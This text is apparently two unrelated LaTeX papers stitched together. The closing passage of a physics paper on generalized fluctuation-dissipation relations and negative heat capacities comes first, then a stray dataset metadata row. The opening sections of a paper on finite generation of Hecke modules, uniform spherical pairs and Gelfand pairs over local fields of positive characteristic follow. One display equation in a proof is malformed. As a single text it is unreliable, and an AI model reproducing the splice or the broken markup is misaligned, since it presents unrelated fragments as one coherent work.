of the generalized equilibrium fluctuation-dissipation relations for
fluid and magnetic systems. Afterwards, we have derived two criteria of
thermodynamic stability accounting for the existence of negative
heat capacities: Eq.(\ref{Thirring.eq}), for systems with
short-range interactions ensuring the existence of a \textit{thermal
contact}; and Eq.(\ref{astro.cond}), for a metastable equilibrium
involving long-range interactions between a globular cluster and its
nearby galaxy. Finally, we have arrived at a stability condition
compatible with anomalous isothermal susceptibilities associated
with the occurrence of a discontinuous phase transition in magnetic
systems, Eq.(\ref{mag.cond}), whose consequences have been also
numerically tested throughout Monte Carlo simulations.
We would like to mention some open questions deserving special
attention in future works:
\begin{itemize}
\item The usual equilibrium fluctuation-dissipation relations
(\ref{can1})\ constitute a particular expression of the so-called
\textit{fluctuation-dissipation theorem}:
\begin{equation}
\beta C^{ij}\left( \tau\right) =\frac{1}{i\pi}P\int_{-\infty}^{+\infty}%
\frac{\chi^{ij}\left( \omega\right) }{\omega}\cos\left(
\omega\tau\right)
d\omega,\label{FDT}%
\end{equation}
relating correlations and response functions in linear response
theory \cite{Reichl}. The present generalization of the equilibrium
fluctuation-dissipation relations suggests a corresponding extension
of this fundamental result.
\item The numerical study of the 2D Ising model clearly shows that
the present ideas are very useful for implementing new
Monte Carlo algorithms inspired by statistical mechanics \cite{mc3}
in order to access macrostates with anomalous response functions.
\item At first glance, the rigorous fluctuation relations (\ref{fundamental}) and
(\ref{assoc.fluct}) clearly exhibit a \textit{tensorial character}, which
suggests a direct connection of the present approach with some geometric
formulations of fluctuation theory developed in the past \cite{Weinhold,rupper}.
A preliminary analysis of such a question is presented in a recent paper
\cite{vel.geo}.
\end{itemize}
\section*{Acknowledgements}
It is a pleasure to acknowledge partial financial support by
FONDECYT 3080003. Velazquez also thanks the partial financial
support by the project PNCB-16/2004 of the Cuban National Programme
of Basic Sciences.
\section*{References}
| 2024-02-18T23:40:05.973Z | 2010-05-19T02:00:16.000Z | algebraic_stack_train_0000 | 1,330 | 14,325 |
|
proofpile-arXiv_065-6707 | \section{Introduction}
Local fields of positive characteristic can be approximated by local fields of characteristic zero. If $F$ and $E$ are local fields, we say that they are $m$-close if $O_F/\mathcal P_F^m \cong O_E/\mathcal P_E^m$, where $O_F, O_E$ are the rings of integers of $F$ and
$E$, and $\mathcal P_F,\mathcal P_E$ are their maximal ideals. \Dima{For example, $\mathbb F_p((t))$ is $m$-close to $\mathbb Q_p(\sqrt[m]{p})$.}
\Dima{More generally, for any local field $F$ of positive characteristic $p$ and any $m$ there exists a (sufficiently ramified) extension of $\mathbb Q_p$ that is $m$-close to $F$.}
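The first example can be checked directly. Write $\pi:=\sqrt[m]{p}$ for a uniformizer of $E=\mathbb Q_p(\sqrt[m]{p})$, so that $O_E=\mathbb Z_p[\pi]$, $\mathcal P_E=(\pi)$ and $\pi^m=p$. Then
$$O_E/\mathcal P_E^m=\mathbb Z_p[\pi]/(\pi^m)\cong \mathbb F_p[\pi]/(\pi^m)\cong \mathbb F_p[t]/(t^m)\cong O_F/\mathcal P_F^m,$$
where $F=\mathbb F_p((t))$ and the first isomorphism uses $p=\pi^m\equiv 0$ modulo $\mathcal P_E^m$.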
Let $G$ be a reductive group defined over $\mathbb Z$. For any local
field $F$ and conductor $\ell \in \mathbb Z_{\geq 0}$, the Hecke algebra
$\mathcal H_{\ell}(G(F))$ is finitely generated and finitely presented. Based
on this fact, Kazhdan showed in \cite{Kaz} that for any $\ell$ there
exists $m \geq \ell$ such that the algebras $\mathcal H_{\ell}(G(F))$ and $
\mathcal H_{\ell}(G(E))$ are isomorphic for any $m$-close fields $F$ and
$E$. This allows one to transfer certain results in representation theory of reductive groups from
local fields of zero characteristic to local fields of positive
characteristic.
In this paper we investigate a relative version of this technique.
\Dima{Let $G$ be a reductive group and $H$ be a spherical subgroup.
Suppose for simplicity that both are defined over $\mathbb Z$.}
In the first part of the paper
we consider the space ${\mathcal S}(G(F)/H(F))^{\Dima{K}}$ of \Dima{compactly supported}
functions
on $G(F)/H(F)$ which are invariant with respect to \Dima{a compact open}
subgroup \Dima{$K$}. We prove under certain assumption on the pair
$(G,H)$ that this space is finitely generated (and hence finitely
presented) over the Hecke algebra $\mathcal H_{\Dima{K}}(G(F))$.
\Dima{\begin{introtheorem}[see Theorem \ref{FinGen}] \lbl{IntFinGen}
Let $F$ be a (non-Archimedean) local field. Let $G$ be a
reductive group and $H<G$ be an algebraic subgroup both defined over $F$. Suppose that
for any parabolic subgroup $P \subset G$, there is a finite number
of double cosets $P(F) \setminus G(F) / H(F)$. Suppose also that
for any irreducible smooth representation $\rho$ of $G(F)$ we have
\begin{equation} \lbl{IntFinMult}
\dim\Hom_{H(F)}(\rho|_{H(F)}, \mathbb C) < \infty .
\end{equation}
Then for any \Dima{compact open}
subgroup $K<G(F)$, the space
${\mathcal S}(G(F)/H(F))^{K}$ is a finitely generated module over the
Hecke algebra $\mathcal{H}_{K}(G(F))$.
\end{introtheorem}}
Assumption (\ref{IntFinMult}) is rather weak in light of the
results of \cite{Del,SV}. In particular, it holds for all
symmetric pairs over fields of characteristic different from 2.
One can easily show that the converse is also true: if
${\mathcal S}(G(F)/H(F))^{K}$ is a finitely generated module over the
Hecke algebra $\mathcal{H}_K(G(F))$ for any \Dima{compact open}
subgroup
$K<G(F)$, then (\ref{IntFinMult}) holds.
\begin{remark*}
Theorem \ref{IntFinGen} implies that, if $\dim\Hom_{H(F)}(\rho|_{H(F)}, \mathbb C)$ is finite, then it is bounded on every Bernstein component.
\end{remark*}
In the second part of the paper we introduce the notion of a
uniform spherical pair and prove for them the following analog of
Kazhdan's theorem.
\begin{introtheorem}[See Theorem \ref{thm:phiModIso}] \lbl{thm:ModIso}
\Dima{Let $H <G$ be reductive groups defined over
$\mathbb Z$. Suppose that the pair $(G,H)$ is uniform spherical.}
\Removed{ and the module
${\mathcal S}(G(F)/H(F))^{K_{\ell}(F)}$ is finitely generated over the Hecke
algebra $\mathcal H_{\ell}(G(F))$ for any $F$ and $l$.}
Then for any $l$ there
exists $n$ such that for any $n$-close local fields $F$ and $E$,
the module ${\mathcal S}(G(F)/H(F))^{K_{\ell}(F)}$ over the algebra $\mathcal H_{\ell}(G(F))$
is isomorphic to the module ${\mathcal S}(G(E)/H(E))^{K_{\ell}(E)}$ over the
algebra $\mathcal H_{\ell}(G(E))$\nir{, where we identify $\mathcal H_{\ell}(G(F))$ and $\mathcal H_{\ell}(G(E))$ using Kazhdan's isomorphism.}
\end{introtheorem}
\Dima{In fact, we prove a more general theorem, see \S \ref{sec:UniSPairs}.}
\Removed{ Together with Theorem \ref{IntFinGen} }
This implies the following
corollary.
\begin{introcorollary}\lbl{cor:GelGel}
Let $(G,H)$ be a uniform spherical pair of reductive groups
defined over $\mathbb Z$. Suppose that
\begin{itemize}
\item For any local field $F$, and any parabolic subgroup $P \subset G$, there is a finite number
of double cosets $P(F) \setminus G(F) / H(F)$.
\Removed{ \item For any local field $F$ and any irreducible smooth representation $\rho$ of $G(F)$ we have
$$\dim\Hom_{H(F)}(\rho|_{H(F)}, \mathbb C) < \infty .$$ }
\item For any local field $F$ of characteristic zero the pair $(G(F),H(F))$ is a Gelfand pair, i.e. for
any irreducible smooth representation $\rho$ of $G(F)$ we have
$$\dim\Hom_{H(F)}(\rho|_{H(F)}, \mathbb C) \leq 1 .$$
\end{itemize}
Then for any local field $F$ the pair $(G(F),H(F))$ is a Gelfand
pair.
\end{introcorollary}
\Dima{In fact, we prove a more general theorem, see \S \ref{sec:UniSPairs}.}
\begin{remark*}
In a similar way one can deduce an analogous corollary for cuspidal representations. Namely, suppose that the first two conditions of the last corollary hold and the third condition holds for all cuspidal representations $\rho$. Then for any local field $F$ the pair $(G(F),H(F))$ is a cuspidal Gelfand pair: for any irreducible smooth cuspidal representation $\rho$ of $G(F)$ we have
$$\dim\Hom_{H(F)}(\rho|_{H(F)}, \mathbb C) \leq 1 .$$
\end{remark*}
\DimaGRCor{
\begin{remark*}
Originally, we included in the formulation of Theorem \ref{thm:ModIso} an extra condition: we demanded that the module
${\mathcal S}(G(F)/H(F))^{K_{\ell}(F)}$ is finitely generated over the Hecke
algebra $\mathcal H_{\ell}(G(F))$ for any $F$ and $l$. This was our original motivation for Theorem \ref{IntFinGen}.
Later we realized that this condition just follows from the definition of uniform spherical pair. However, we think that Theorem \ref{IntFinGen} and the technique we use in its proof have importance of their own.
\end{remark*}}
In the last part of the paper we apply our technique to show
that $(\GL_{n+1},\GL_n)$ is a strong Gelfand pair over any local
field and $(\GL_{n+k},\GL_n \times \GL_k)$ is a Gelfand pair over
any local field of odd characteristic.
\begin{introtheorem} \lbl{thm:Mult1}
Let $F$ be any local field. Then $(\GL_{n+1}(F),\GL_n(F))$ is a
strong Gelfand pair, i.e. for any irreducible smooth
representations $\pi$ of $\GL_{n+1}(F)$ and $\tau$ of $\GL_{n}(F)$
we have
$$\dim \Hom_{\GL_{n}(F)} (\pi, \tau) \leq 1.$$
\end{introtheorem}
\begin{introtheorem} \lbl{thm:UniLinPer}
Let $F$ be any local field. Suppose that $\operatorname{char} F \neq 2$. Then
$(\GL_{n+k}\Dima{(F)},\GL_n\Dima{(F)} \times \GL_k\Dima{(F)})$ is a Gelfand pair.
\end{introtheorem}
We deduce these theorems from the zero characteristic case, which
was proven in \cite{AGRS} and \cite{JR} respectively. The proofs
in \cite{AGRS} and \cite{JR} cannot be directly adapted to the
case of positive characteristic since they rely on the Jordan
decomposition, which is problematic in positive characteristic because local fields of positive characteristic are not perfect.
\begin{remark*}
In \cite{AGS}, a special case of Theorem \ref{thm:Mult1} was
proven for all local fields; namely the case when $\tau$ is
one-dimensional.
\end{remark*}
\begin{remark*}
In \cite{AG_AMOT} and (independently) in \cite{SZ}, an analog of
Theorem \ref{thm:Mult1} was proven for Archimedean local fields.
In \cite{AG_HC}, an analog of Theorem \ref{thm:UniLinPer} was
proven for Archimedean local fields.
\end{remark*}
\subsection{Structure of the paper}$ $
\Dima{In Section \ref{sec:PrelNot} we introduce notation and give some general preliminaries.}\Rami{\\
In Section \ref{sec:FinGen} we prove Theorem \ref{IntFinGen}.
In Subsection \ref{subsec:prel} we collect a few general facts for the proof. One is a criterion, due to Bernstein, for finite generation of the space of $K$-invariant vectors in a representation of a reductive group $G$; the other facts concern homologies of $l$-groups. In Subsection \ref{subsec:desc.cusp} we prove the main inductive step in the proof of Theorem \ref{IntFinGen}, and in Subsection \ref{SecPfFinGen} we prove Theorem \ref{IntFinGen}. Subsection \ref{subsec:homologies} is devoted to the proofs of some facts about the homologies of $l$-groups.\\
In Section \ref{sec:UniSPairs} we prove Theorem \ref{thm:ModIso} and derive Corollary \ref{cor:GelGel}.
In Subsection \ref{subsec:UniSpairs} we introduce the notion of uniform spherical pair. In Subsection \ref{subsec:CloseLocalFields} we prove the theorem and the corollary.\\
We apply our results in Section \ref{sec:ap}. In Subsection \ref{subsec:JR} we prove that the pair $(\GL_{n+k}, \GL_n \times\GL_k )$ satisfies the assumptions of Corollary \ref{cor:GelGel} over fields of characteristic different from 2. In Subsections \ref{subsec:GL} and \ref{subsec:PfGood} we prove that the pair
$(\GL_{n+1}\times\GL_n , \Delta \GL_n)$ satisfies the assumptions of Corollary \ref{cor:GelGel}.
These facts imply Theorems \ref{thm:Mult1} and \ref{thm:UniLinPer}.
\subsection{Acknowledgments}$ $
We thank {\bf Joseph Bernstein} for directing us to the paper
\cite{Kaz}.
We also thank {\bf Vladimir Berkovich}, {\bf Joseph Bernstein}, {\bf Pierre Deligne},
{\bf Patrick Delorme}, {\bf Jochen Heinloth}, \RGRCor{{\bf Anthony Joseph,}}
{\bf David Kazhdan} ,{\bf Yiannis
Sakelaridis}, and {\bf Eitan Sayag} for fruitful discussions and the referee for many useful remarks.
A.A. was supported by a BSF grant, a GIF grant, an ISF Center
of excellency grant and ISF grant No. 583/09.
N.A. was supported by NSF grant DMS-0901638.
D.G. was supported by NSF grant DMS-0635607. Any opinions, findings and conclusions or recommendations expressed in this material are those of the authors and do not necessarily reflect the views of the National Science Foundation.
\section{Preliminaries and notation} \lbl{sec:PrelNot}
\begin{defn}
A local field is a locally compact complete non-discrete topological field. In this paper we will consider only non-Archimedean local fields. All such fields have discrete valuations.
\end{defn}
\begin{remark}
Any local field of characteristic zero and residue characteristic $p$ is a finite extension of the field $\mathbb Q_p$ of $p$-adic numbers and any local field of characteristic $p$ is a finite extension of the field $\mathbb F_p((t))$ of formal Laurent series over the field with $p$ elements.
\end{remark}
\begin{notn}
For a local field $F$ we denote by $val_F$ its valuation, by $O_F$ the ring of integers and by $\mathcal P_F$ its unique maximal ideal.
For an algebraic group $G$ defined over $O_F$ we denote by $K_{\ell}(G,F)$ the kernel of the (surjective) morphism $G(O_F)\to G(O_F/\mathcal P_F^{\ell})$. If $\ell>0$ then we call $K_{\ell}(G,F)$ the $\ell$-th congruence subgroup.
\end{notn}
\Rami{
We will use the terminology of $l$-spaces and $l$-groups introduced in \cite{BZ}. An $l$-space is a locally compact second countable totally disconnected topological space, and an $l$-group is an $l$-space with a continuous group structure. For \Dima{further background} on $l$-spaces, $l$-groups and their representations we refer the reader to \cite{BZ}.}
\begin{notn}
Let $G$ be an $l$-group.
Denote by
$\mathcal M(G)$ the category of smooth \nir{complex} representations of $G$.
Define the functor of coinvariants $CI_G:\mathcal M(G) \to Vect$ by
$$CI_G(V):= V/({\operatorname{Span}}\{v-gv\, | \, v\in V, \, g\in G\}).$$
Sometimes we will also denote $V_G:=CI_G(V)$.
\end{notn}
\begin{notn}
For an $l$-space $X$ we denote by
${\mathcal S}(X)$ the space of locally constant compactly supported complex valued functions on $X$%
\Rami{. If $X$ is an analytic variety over a non-Archimedean local field, we denote}
by $\mathcal M(X)$ the space of locally constant compactly supported measures on $X$.
\end{notn}
\begin{notn}
For an $l$-group $G$ and an open compact subgroup $K$ we denote by
$\mathcal H(G,K)$ or $\mathcal H_K(G)$ the Hecke algebra of $G$ w.r.t. $K$, i.e. the algebra of compactly supported measures on $G$ that are invariant w.r.t. both left and right multiplication by $K$.
For a local field $F$ and a reductive group $G$ defined over $O_F$ we will also denote $\mathcal H_{\ell}(G(F)):=\mathcal H_{K_{\ell}(G)}(G(F))$.
\end{notn}
\nir{\begin{notn}
By a reductive group over a ring $R$, we mean a smooth group scheme over $\Spec(R)$ all of whose geometric fibers are reductive and connected.
\end{notn}}
\section{Finite Generation of Hecke Modules} \lbl{sec:FinGen}
The goal of this section is to prove Theorem \ref{IntFinGen}.
In this section $F$ is a fixed (non-Archimedean) local field of
arbitrary characteristic. All the algebraic groups and algebraic
varieties that we consider in this section are defined over $F$. \nir{In particular, reductive means reductive over $F$}.
\nir{For the reader's convenience, we now give an overview of the argument. In Lemma \ref{VKFinGen} we present a criterion, due to Bernstein, for the finite generation of spaces of $K$-invariants. The proof of the criterion uses the theory of Bernstein Center. This condition is given in terms of all parabolic subgroups of $G$. We directly prove this condition when the parabolic is $G$ (this is Step 1 in the proof of Theorem \ref{IntFinGen}). The case of general parabolic is reduced to the case where the parabolic is $G$. For this, the main step is to show that the assumptions of the theorem imply similar assumptions for the Levi components of the parabolic subgroups of $G$. This is proved in Lemma \ref{FinMultCuspDesc} by stratifying the space $G(F)/P(F)$ according to the $H(F)$-orbits inside it.
}
\Dima{In the proof of this lemma we use two homological tools: Lemma \ref{FinDimH1H0}, which gives a criterion for finite dimensionality of the first homology of a representation, and
Lemma \ref{LemShap}, which connects the homologies of a representation and of its induction.}
\subsection{Preliminaries} \lbl{subsec:prel}
\Dima{
\begin{notn}
For $l$-groups $H<G$ we denote by $ind_H^G: \mathcal M(H) \to \mathcal M(G)$ the compactly supported induction functor and by $Ind_H^G: \mathcal M(H) \to \mathcal M(G)$ the full induction functor.
\end{notn}
}
\begin{defn}
\Dima{Let $G$ be a reductive group, let $P<G$ be a parabolic subgroup with unipotent radical $U$, and let $M:=P/U$.
Such $M$ is called a Levi subquotient of $G$.
Note that every representation of $M(F)$ can be considered as a representation of $P(F)$ using the quotient morphism $P \twoheadrightarrow M$.
Define:
\begin{enumerate}
\item The Jacquet functor $r_{GM}:\mathcal M(G(F)) \to \mathcal M(M(F))$ by $r_{GM}(\pi):=(\pi|_{P(F)})_{U(F)}$.
\item The parabolic induction functor $i_{GM}:\mathcal M(M(F)) \to \mathcal M(G(F))$ by $i_{GM}(\tau):=ind_{P(F)}^{G(F)}(\tau)$.
\end{enumerate}
Note that
$i_{GM}$ is right adjoint to $r_{GM}$.
A representation $\pi$ of $G(F)$ is called cuspidal if $r_{GM}(\pi)=0$ for any Levi subquotient $M$ of $G$.}
\end{defn}
\begin{definition}
Let $G$ be an $l$-group. A smooth representation $V$ of $G$ is
called \textbf{compact} if for any $v \in V$ and $\xi \in
\widetilde{V}$ the matrix coefficient function defined by
$m_{v,\xi}(g):= \xi(gv)$ is a compactly supported function on $G$.
\end{definition}
\begin{theorem}[Bernstein-Zelevinsky]\lbl{CompProj}
Let $G$ be an $l$-group. Then any compact representation of $G$ is
a projective object in the category $\mathcal M(G)$.
\end{theorem}
\begin{definition}
Let $G$ be a reductive group. \\
(i) Denote by $G^1$ the preimage in $G(F)$ of the maximal compact
subgroup of $G(F)/[G,G](F)$.\\
(ii) Denote $G_0:=G^1Z(G(F))$.\\
(iii) A complex character of $G(F)$ is called unramified if it is trivial
on $G^1$. We denote the \Dima{set} of all unramified
characters by $\Psi_G$. \Dima{Note that $G(F)/G^1$ is a lattice and therefore we can identify $\Psi_G$ with $(\mathbb C^{\times})^n$. This defines a structure of algebraic variety on $\Psi_G$.}\\
(iv) \Dima{For any smooth representation $\rho$ of $G(F)$ we denote
$\Psi(\rho):= ind_{G^1}^G(\rho|_{G^1})$. Note that $\Psi(\rho) \simeq \rho \otimes \mathcal O(\Psi_G),$
where $G(F)$ acts only on the first factor, but this action depends on the second factor.
This identification gives a structure of $\mathcal O(\Psi_G)$-module on $\Psi(\rho)$.}
\end{definition}
\nir{\begin{rem} The definition of unramified characters above is not the standard one, but it is more convenient for our purposes.
\end{rem}}
\begin{theorem}[Harish-Chandra]\lbl{CuspComp}
Let $G$ be a reductive group and $V$ be a cuspidal representation
of $G(F)$. Then $V|_{G^1}$ is a compact representation of $G^1$.
\end{theorem}
\begin{corollary} \lbl{CuspProj}
Let $G$ be a reductive group and $\rho$ be a cuspidal
representation
of $G(F)$. Then\\
(i) $\rho|_{G^1}$ is a projective object in the category
$\mathcal M(G^1)$.\\
(ii) $\Psi(\rho)$ is a projective object in the category
$\mathcal M(G(F))$.
\end{corollary}
\begin{proof}
(i) is clear.\\
(ii) Note that $$Hom_G(\Psi(\rho),\pi) \cong
Hom_{G/G^1}(\mathcal O(\Psi_G),Hom_{G^1}(\rho,\pi)),$$
for any representation $\pi$. Therefore the functor $\pi \mapsto
Hom_G(\Psi(\rho),\pi)$ is a composition of two exact functors and
hence is exact.
\end{proof}
\Dima{
\begin{defn}
Let $G$ be a reductive group and $K<G(F)$ be a compact open subgroup. Denote $$\mathcal M(G,K):= \{V \in \mathcal M(G(F))\, | \, V \text{ is generated by }V^K\}$$ and $$\mathcal M(G,K)^{\bot}:=
\{V \in \mathcal M(G(F))\, | \, V^K = 0\}.$$
We call $K$ a splitting subgroup if the category $\mathcal M(G(F))$ is the direct sum of the categories $\mathcal M(G,K)$ and $\mathcal M(G,K)^{\bot}$, and $\mathcal M(G,K) \cong \mathcal M(\mathcal H_K(G))$. \nir{Recall that an abelian category $\mathcal{A}$ is a direct sum of two abelian subcategories $\mathcal{B}$ and $\mathcal{C}$, if every object of $\mathcal{A}$ is isomorphic to a direct sum of an object in $\mathcal{B}$ and an object in $\mathcal{C}$, and, furthermore, that there are no non-trivial
\Dima{ morphisms }
between objects of $\mathcal{B}$ and $\mathcal{C}$.}
\end{defn}
}
We will use the following statements from Bernstein's theory on
the center of the category $\mathcal M(G)$.
\Dima{Let $P<G$ be a parabolic subgroup and $M$ be the reductive quotient of $P$.}
\begin{enumerate}
\item \lbl{1} \Dima{ The set of splitting subgroups defines a basis at 1 for the topology of $G(F)$.} \nir{If $G$ splits over
\Rami{$O_F$}
then, for any large enough $\ell$, the congruence subgroup $K_\ell(G,F)$ is splitting.}
\item \lbl{2} \Dima{Let $\overline{P}$ denote the parabolic subgroup of $G$ opposite to $P$, and let $\overline{r}_{GM}:\mathcal M(G(F)) \to \mathcal M(M(F))$ denote the Jacquet functor defined using $\overline{P}$.
Then $\overline{r}_{GM}$ is right adjoint to $i_{GM}$. In particular, $i_{GM}$ maps projective objects to projective ones and hence for any irreducible cuspidal
representation $\rho$
of $M(F)$,
$i_{GM}(\Psi(\rho))$ is a projective object of $\mathcal M(G(F))$.}
\item \lbl{3} Denote by $\mathcal M_{\rho}$ the subcategory of $\mathcal M(G(F))$
generated by $i_{GM}(\Psi(\rho))$. Then $$\mathcal M(G,K) =
\oplus_{(M,\rho) \in B_K} \mathcal M_{\rho},$$ where $B_K$ is some finite
set of pairs consisting of a Levi subquotient of $G$ and its cuspidal
representation. Moreover, for any Levi subquotient $M<G$ and a
cuspidal representation $\rho$ of $M(F)$ such that $\mathcal M_{\rho}
\subset \mathcal M(G,K)$ there exists $(M',\rho')\in B_K$ such that
$\mathcal M_{\rho} = \mathcal M_{\rho '}$.
\item \lbl{4} $End(i_{GM}(\Psi(\rho)))$ is finitely generated over
$\mathcal O(\Psi)$ \nir{which is finitely generated over the center of the ring
$End(i_{GM}(\Psi(\rho)))$. The center of the ring $End(i_{GM}(\Psi(\rho)))$ is equal to the center \Dima{$Z(\mathcal M_{\rho})$} of the category $\mathcal M_{\rho}$.}
\end{enumerate}
For statement \ref{1} \Dima{see e.g. \cite[pp. 15-16]{BD} and \cite[\S 2]{HcHvDJ}.}
For
statement \ref{2} see \cite{BerSec} or \cite[Theorem 3]{Bus}.
For statements \ref{3},\ref{4} see \cite[Proposition 2.10,2.11]{BD}.
\Dima{We now present} a criterion, due to Bernstein, for finite generation of the space $V^K$, consisting of vectors in a representation $V$ that are invariant with respect to \Dima{a compact open}
subgroup $K$.
\Rami{
\begin{lemma} \lbl{VKFinGen}
Let $V$ be a smooth representation of $G(F)$. Suppose that for any
parabolic $P<G$ and any irreducible cuspidal representation $\rho$
of $M(F)$ (where $M$ denotes the \Dima{reductive quotient}
of $P$),
$ \Hom_{G(F)}(i_{GM}(\Psi(\rho)),V)$ is a finitely generated
module over $\mathcal O(\Psi_M)$. Then $V^K$ is a finitely generated
module over $\Dima{Z(\mathcal{H}_K(G(F)))}$, for any compact open
subgroup $K<G(F)$.
\end{lemma}
}
\begin{proof}$ $\\
\Rami{
Step 1. Proof for the case when $K$ is splitting and $V=i_{GM}(\Psi(\rho))$ for some Levi
subquotient $M$ of $G$ and an irreducible cuspidal representation $\rho$
of $M(F).$
\Dima{Let $P$ denote the parabolic subgroup that defines $M$ and $U$ denote its unipotent radical.
Denote $K_M:=K/(U\Dima{(F)}\cap K)<M\Dima{(F)}$.}
If $V^K=0$ there is nothing to prove. Otherwise $\mathcal M_{\rho}$ is a
direct summand of $\mathcal M(G,K)$. Now
$$V^K = \Psi(\rho)^{K_M} = \rho^{K_M} \otimes \mathcal O(\Psi).$$
Hence $V^K$ is finitely generated over $Z(\mathcal M_{\rho})$. Hence
$V^K$ is finitely generated over $Z(\mathcal M(G,K)) = Z(\mathcal H_K(G))$.
}
\Rami{
Step 2. Proof for the case when $K$ is splitting and $V \in \mathcal M_{\rho}$ for some Levi
subquotient $M<G$ and an irreducible cuspidal representation $\rho$
of $M(F)$.
}
\Rami{
Let $$\phi: i_{GM}(\Psi(\rho)) \otimes \Hom(i_{GM}(\Psi(\rho)),V)
\twoheadrightarrow V$$ be the natural epimorphism. We are given that
$\Hom(i_{GM}(\Psi(\rho)),V)$ is finitely generated over
$\mathcal O(\Psi)$. Hence it is finitely generated over $Z(\mathcal M(\rho))$.
Choose some generators $\alpha_1, \dots, \alpha_n \in
\Hom(i_{GM}(\Psi(\rho)),V)$. Let $$\psi: i_{GM}(\Psi(\rho))^n$$
\hookrightarrow i_{GM}(\Psi(\rho)) \otimes
\Hom(i_{GM}(\Psi(\rho)),V)$$ be the corresponding morphism.
$Im(\phi \circ \psi)$ is $Z(\mathcal M(\rho))$-invariant and hence
coincides with $Im(\phi)$. Hence $\phi \circ \psi$ is onto. The
statement now follows from the previous step.
}
\Rami{
Step 3. Proof for the case when $K$ is splitting.
}
\Rami{
Let $W<V$ be the subrepresentation generated by $V^K$. By
definition $W \in \mathcal M(G,K)$ and hence $W = \oplus_{i=1}^n W_i$
where $W_i \in \mathcal M_{\rho_i}$ for some $\rho_i$. The lemma now
follows from the previous step.
}
\Rami{
Step 4. General case
}
\Rami{
Let $K'$ be a splitting subgroup s.t. $K'<K$.
Let $v_1,\dots,v_n \in V^{K'}$ be the generators of $V^{K'}$ over
$Z(\mathcal{H}_{K'}(G(F)))$ given by the previous step. Define $w_i:=e_{K}\Dima{v_i} \in V^{K}$ where $e_{K}\in \mathcal{H}_{K}(G(F))$ is the normalized Haar measure of $K.$ Let us show that $w_i$ generate $V^{K}$ over
$Z(\mathcal{H}_{K}(G(F)))$. Let $x \in V^{K}$. We can represent $x$ as a sum $\sum h_i v_i$, where $h_i \in Z(\mathcal{H}_{K'}(G(F)))$. Now $$x=e_{K}x=\sum e_{K}h_i v_i=\sum e_{K} e_{K}h_i v_i=\sum e_{K} h_i e_{K}v_i=\sum e_{K} h_i e_{K} e_{K}v_i= \sum e_{K} h_i e_{K} w_i.$$}
\end{proof}
Finally, in this subsection, we state two facts about homologies of $l$-groups. The proofs and relevant definitions are in Subsection \ref{subsec:homologies}.
\begin{lemma} \lbl{FinDimH1H0}
Let $G$ be an algebraic group and $U$ be its unipotent radical.
Let $\rho$ be an irreducible cuspidal representation of
$(G/U)(F)$. We treat $\rho$ as a representation of $G(F)$ with
trivial action of $U(F)$.
Let $H<G$ be an algebraic subgroup. Suppose that the space of
coinvariants $\rho_{H(F)}$ is finite dimensional. Then $\dim
\operatorname{H}_1(H(F),\rho)< \infty .$
\end{lemma}
We will also use the following version of Shapiro Lemma.
\begin{lemma} \lbl{LemShap}
Let $G$ be an $l$-group that acts transitively on an $l$-space
$X$. Let $\mathcal F$ be a $G$-equivariant sheaf over $X$. Choose a point
$x \in X$, let $\mathcal F_x$ denote the stalk of $\mathcal F$ at $x$ and $G_x$
denote the stabilizer of $x$. Then
$$\operatorname{H}_i(G,\mathcal F(X))= \operatorname{H}_i(G_x,\mathcal F_x).$$
\end{lemma}
\subsection{Descent of Finite Multiplicity} \lbl{subsec:desc.cusp}
\begin{definition}
We call a pair $(G,H)$ consisting of a reductive group $G$ and an
algebraic subgroup $H$ \textbf{an $F$-spherical pair} if for any
parabolic subgroup $P \subset G$, there is a finite number of
double cosets in $P(F) \setminus G(F) / H(F)$.
\end{definition}
\begin{remark}
If $char F=0$ \Dima{and $G$ is quasi-split over $F$} then $(G,H)$ is an $F$-spherical pair if and only if
it is a spherical pair of algebraic groups. However, we do not
know whether this is true if $char F>0$.
\end{remark}
\begin{notation}
Let $G$ be a reductive group and $H$ be a subgroup. Let $P<G$ be
a parabolic subgroup and $M$ be its Levi quotient. We denote by
$H_M$ the image of \nir{$H\cap P$} under the projection $P \twoheadrightarrow
M$.
\end{notation}
The following lemma is the main step in the proof of Theorem \ref{IntFinGen}.
\begin{lemma} \lbl{FinMultCuspDesc}
Let $(G,H)$ be an $F$-spherical pair. Let $P<G$ be a parabolic
subgroup and $M$ be its Levi \nir{quotient}. Then\\
(i) $(M, H_M)$ is also an $F$-spherical pair.\\
(ii) Suppose also that for any smooth irreducible representation
$\rho$ of $G(F)$ we have $$\dim\Hom_{H(F)}(\rho|_{H(F)}, \mathbb C) <
\infty.$$ Then for any irreducible cuspidal representation $\sigma$
of $M(F)$ we have $$\dim\Hom_{H_M(F)}(\sigma|_{H_M(F)}, \mathbb C) <
\infty.$$
\end{lemma}
\begin{remark}
One can show that the converse of (ii) is also true. Namely, if
$\dim\Hom_{H_M(F)}(\sigma|_{H_M(F)}, \mathbb C) < \infty$ for any
irreducible cuspidal representation $\sigma$ of $M(F)$ for any
Levi subquotient $M$ then $\dim\Hom_{H(F)}(\rho|_{H(F)}, \mathbb C) <
\infty$ for any smooth irreducible representation $\rho$ of
$G(F)$. We will not prove this since we will not use it.
\end{remark}
We will need the following lemma.
\begin{lemma} \lbl{LinAlg}
Let $M$ be an l-group and $V$ be a smooth representation of $M$.
Let $0=F^0V \subset ... \subset F^{n-1}V \subset F^nV=V$ be a
finite filtration of $V$ by subrepresentations. Suppose that for
any $i$, either $$\dim (F^iV/F^{i-1}V)_M = \infty$$ or $$\text{both }\dim
(F^iV/F^{i-1}V)_M < \infty \text{ and }\dim \operatorname{H}_1(M,(F^iV/F^{i-1}V)) <
\infty.$$ Suppose also that $\dim V_M < \infty$. Then $\dim
(F^iV/F^{i-1}V)_M < \infty$ for any $i$.
\end{lemma}
\begin{proof}
\nir{We prove by descending induction on $i$ that $\dim(F^iV)_M<\infty$, and, therefore, $\dim(F^iV/F^{i-1}V)_M<\infty$; the base case $i=n$ is the assumption $\dim V_M < \infty$. Consider the short exact sequence
$$0 \to F^{i-1}V \to F^iV \to F^iV/F^{i-1}V \to 0,$$
and the corresponding long exact sequence
$$...\to \operatorname{H}_1(M,(F^iV/F^{i-1}V)) \to (F^{i-1}V)_M \to (F^iV)_M \to (F^iV/F^{i-1}V)_M \to 0.$$
Since $(F^iV/F^{i-1}V)_M$ is a quotient of $(F^iV)_M$, it is finite dimensional, and hence by the assumed dichotomy $\dim \operatorname{H}_1(M,(F^iV/F^{i-1}V))< \infty$. As also $\dim
(F^iV)_M < \infty$, the long exact sequence yields $\dim (F^{i-1}V)_M < \infty$.}
\end{proof}
Now we are ready to prove Lemma \ref{FinMultCuspDesc}.
